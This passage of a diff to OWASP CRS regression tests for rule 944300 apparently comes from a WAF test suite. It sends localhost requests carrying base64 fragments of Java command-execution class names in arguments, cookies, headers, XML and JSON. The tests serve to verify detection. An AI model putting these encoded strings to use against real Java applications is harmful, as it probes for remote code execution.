Content-Type: "application/x-www-form-urlencoded" - Cookie: test=BydW50aW1l - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-26 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BydW50aW1l + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 26 desc: "Cookie name includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: BydW50aW1l=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-27 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BydW50aW1l=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 27 desc: "Request header test includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test 
agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BydW50aW1l - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-28 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BydW50aW1l + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 28 desc: "XML attribute value includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-29 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 29 desc: "XML element value includes keyword BydW50aW1l" stages: - - stage: - 
input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BydW50aW1l" - output: - log_contains: "id \"944300\"" - - test_title: 944300-30 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BydW50aW1l" + output: + log_contains: "id \"944300\"" + - test_id: 30 desc: "Nested XML element value includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BydW50aW1l" - output: - log_contains: "id \"944300\"" - - test_title: 944300-31 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BydW50aW1l" + output: + log_contains: "id \"944300\"" + - test_id: 31 desc: "Content-Type text/plain includes keyword 
BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BydW50aW1l" - output: - log_contains: "id \"944300\"" - - test_title: 944300-32 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BydW50aW1l" + output: + log_contains: "id \"944300\"" + - test_id: 32 desc: "Content-Type application/json arg value includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"BydW50aW1l\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-33 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"BydW50aW1l\"}" + output: + log_contains: 
"id \"944300\"" + - test_id: 33 desc: "Content-Type application/json arg name includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"BydW50aW1l\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-34 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"BydW50aW1l\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 34 desc: "Argument test includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cHJvY2Vzc2J1aWxkZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-35 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cHJvY2Vzc2J1aWxkZXI" + output: + log_contains: "id \"944300\"" + - test_id: 35 desc: "Argument name includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvY2Vzc2J1aWxkZXI=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-36 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvY2Vzc2J1aWxkZXI=test" + output: + log_contains: "id \"944300\"" + - test_id: 36 desc: "Cookie test includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=cHJvY2Vzc2J1aWxkZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-37 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cHJvY2Vzc2J1aWxkZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 37 desc: "Cookie name includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: cHJvY2Vzc2J1aWxkZXI=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-38 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cHJvY2Vzc2J1aWxkZXI=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 38 desc: "Request header test includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: cHJvY2Vzc2J1aWxkZXI - method: "POST" - uri: 
"/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-39 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cHJvY2Vzc2J1aWxkZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 39 desc: "XML attribute value includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-40 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 40 desc: "XML element value includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - 
Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvY2Vzc2J1aWxkZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-41 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvY2Vzc2J1aWxkZXI" + output: + log_contains: "id \"944300\"" + - test_id: 41 desc: "Nested XML element value includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvY2Vzc2J1aWxkZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-42 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvY2Vzc2J1aWxkZXI" + output: + log_contains: "id \"944300\"" + - test_id: 42 desc: "Content-Type text/plain includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cHJvY2Vzc2J1aWxkZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-43 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cHJvY2Vzc2J1aWxkZXI" + output: + log_contains: "id \"944300\"" + - test_id: 43 desc: "Content-Type application/json arg value includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"cHJvY2Vzc2J1aWxkZXI\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-44 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"cHJvY2Vzc2J1aWxkZXI\"}" + output: + log_contains: "id \"944300\"" + - test_id: 44 desc: "Content-Type application/json arg name includes keyword 
cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"cHJvY2Vzc2J1aWxkZXI\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-45 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"cHJvY2Vzc2J1aWxkZXI\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 45 desc: "Argument test includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HByb2Nlc3NidWlsZGVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-46 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + 
version: "HTTP/1.0" + data: "test=HByb2Nlc3NidWlsZGVy" + output: + log_contains: "id \"944300\"" + - test_id: 46 desc: "Argument name includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb2Nlc3NidWlsZGVy=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-47 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb2Nlc3NidWlsZGVy=test" + output: + log_contains: "id \"944300\"" + - test_id: 47 desc: "Cookie test includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=HByb2Nlc3NidWlsZGVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-48 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HByb2Nlc3NidWlsZGVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 48 desc: "Cookie name includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HByb2Nlc3NidWlsZGVy=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-49 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HByb2Nlc3NidWlsZGVy=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 49 desc: "Request header test includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: HByb2Nlc3NidWlsZGVy - method: "POST" - uri: 
"/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-50 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HByb2Nlc3NidWlsZGVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 50 desc: "XML attribute value includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-51 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 51 desc: "XML element value includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - 
Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb2Nlc3NidWlsZGVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-52 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb2Nlc3NidWlsZGVy" + output: + log_contains: "id \"944300\"" + - test_id: 52 desc: "Nested XML element value includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - 